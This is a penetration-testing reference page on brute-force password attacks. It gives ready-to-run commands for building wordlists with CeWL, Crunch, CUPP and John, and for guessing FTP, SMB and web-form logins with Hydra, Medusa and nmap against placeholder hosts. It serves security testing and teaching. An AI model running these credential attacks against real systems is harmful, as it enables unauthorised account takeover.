Brute Forcing

Brute Forcing

At a Glance

A brute-forcing attack consists of systematically enumerating all possible candidates for the solution and checking whether each candidate satisfies the problem’s statement.

In cryptography, a brute-force attack involves systematically checking all possible keys until the correct key is found. 1

Note: The success and efficiency of a brute-force attack rely mostly on the wordlist. Use a highly-reputed one.

Default Credentials

Note: SecLists and WordList Compendium also include default passwords lists.

Wordlists

Wordlist Generation

CeWL 2

cewl example.com -m 3 -w wordlist.txt
Parameters
  • -m <length>: Minimum word length.
  • -w <file>: Write the output to <file>.

Crunch 3

Simple wordlist.

crunch 6 12 abcdefghijk1234567890\@\! -o wordlist.txt

String permutation.

crunch 1 1 -p target pass 2019 -o wordlist.txt

Patterns.

crunch 9 9 0123456789 -t @target@@ -o wordlist.txt
Parameters
  • <min-len>: The minimum string length.
  • <max-len>: The maximum string length.
  • <charset>: Characters set.
  • -o <file>: Specifies the file to write the output to.
  • -p <charset or strings>: Permutation.
  • -t <pattern>: Specifies a pattern, eg: @@pass@@@@.
    • @ will insert lower case characters
    • , will insert upper case characters
    • % will insert numbers
    • ^ will insert symbols

Password Profiling

CUPP 4

cupp -i
Parameters
  • -i: Interactive uestions for user password profiling.

Word Mangling

john 5

john --wordlist=wordlist.txt --rules --stdout
Parameters
  • --wordlist <file>: Wordlist mode, read words from <file> or stdin.
  • --rules[:CustomRule]: Enable word mangling rules. Use default or add [:CustomRule].
  • --stdout: Output candidate passwords.

Note:

Custom rules can be appended to John’s configuration file john.conf.

See: KoreLogic’s Word Mangling Rule

Services

FTP

See Combo (Colon Separated) Lists.

Hydra 6

hydra -v -l ftp -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 ftp
Parameters
  • -v: verbose mode.
  • -l <user>: login with user name.
  • -P <passwords file>: login with passwords from file.
  • -f: exit after the first found user/password pair.

SMB

Hydra 6

hydra -v -t1 -l Administrator -P /usr/share/wordlists/rockyou.txt -f 10.0.0.3 smb
Parameters
  • -v: verbose mode.
  • -t <tasks>: run <tasks> number of connects in parallel. Default: 16.
  • -l <user>: login with user name.
  • -P <passwords file>: login with passwords from file.
  • -f: exit after the first found user/password pair.

smb-brute NSE Script.

sudo nmap --script smb-brute -p U:137,T:139 10.0.0.3

Web Applications

HTTP Basic Auth

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-head /admin/

HTTP Digest

hydra -L users.txt -P /usr/share/wordlists/rockyou.txt example.com http-get /admin/

HTTP POST Form

hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed"
Parameters
  • -l <user>: login with user name.
  • -L <users-file>: login with users from file.
  • -P <passwords file>: login with passwords from file.
  • http-head | http-get | http-post-form: service to attack.

HTTP Authenticated POST Form

Append the Cookie header with the session id to the options string, e.g., :H=Cookie\: security=low; PHPSESSID=if0kg4ss785kmov8bqlbusva3v. 6

hydra -l admin -P /usr/share/wordlists/rockyou.txt example.com https-post-form "/login.php:username=^USER^&password=^PASS^&login=Login:Not allowed:H=Cookie\: PHPSESSID=if0kg4ss785kmov8bqlbusva3v"

Miscellaneous

Combo (Colon Separated) Lists

Hydra 6

Use a colon separated login:pass format, instead of -L/-P options.

hydra -v -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt -f 10.0.0.3 ftp
Parameters
  • -v: verbose mode.
  • -C <user:pass file>: colon-separated “login:pass” format.
  • -f: exit after the first found user/password pair.

Medusa 7

Medusa’s combo files (colon-separated) should be in the format host:username:password. If any of the three values are missing, the respective information should be provided either as a global value or as a list in a file.

sed s/^/:/ /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt > /tmp/cplist.txt
medusa -C /tmp/cplist.txt -h 10.0.0.3 -M ftp
Parameters
  • -u <user>: login with user name.
  • -P <passwords file>: login with password from file.
  • -h: target hostname or IP address.
  • -M: module to execute.

Further Reading


  1. Contributors to Wikimedia projects. “Brute-Force Search - Wikipedia.” Wikipedia, the Free Encyclopedia, Wikimedia Foundation, Inc., 13 Oct. 2002, https://en.wikipedia.org/wiki/Brute-force_search. ↩︎

  2. digininja. “GitHub - Digininja/CeWL: CeWL Is a Custom Word List Generator.” GitHub, https://github.com/digininja/CeWL/. ↩︎

  3. “Crunch - Wordlist Generator Download.” SourceForge, https://sourceforge.net/projects/crunch-wordlist/. ↩︎

  4. Mebus. “GitHub - Mebus/Cupp: Common User Passwords Profiler (CUPP).” GitHub, https://github.com/Mebus/cupp. ↩︎

  5. magnumripper. “JohnTheRipper.” GitHub, https://github.com/magnumripper/JohnTheRipper. ↩︎

  6. Heuse, Marc. “GitHub - Vanhauser-Thc/Thc-Hydra: Hydra.” GitHub, https://github.com/vanhauser-thc/thc-hydra. Accessed 12 May 2020. ↩︎

  7. “Foofus Networking Services - Medusa.” Foofus.Net | Foofus.Net Advanced Security Services Forum, http://foofus.net/goons/jmk/medusa/medusa.html. ↩︎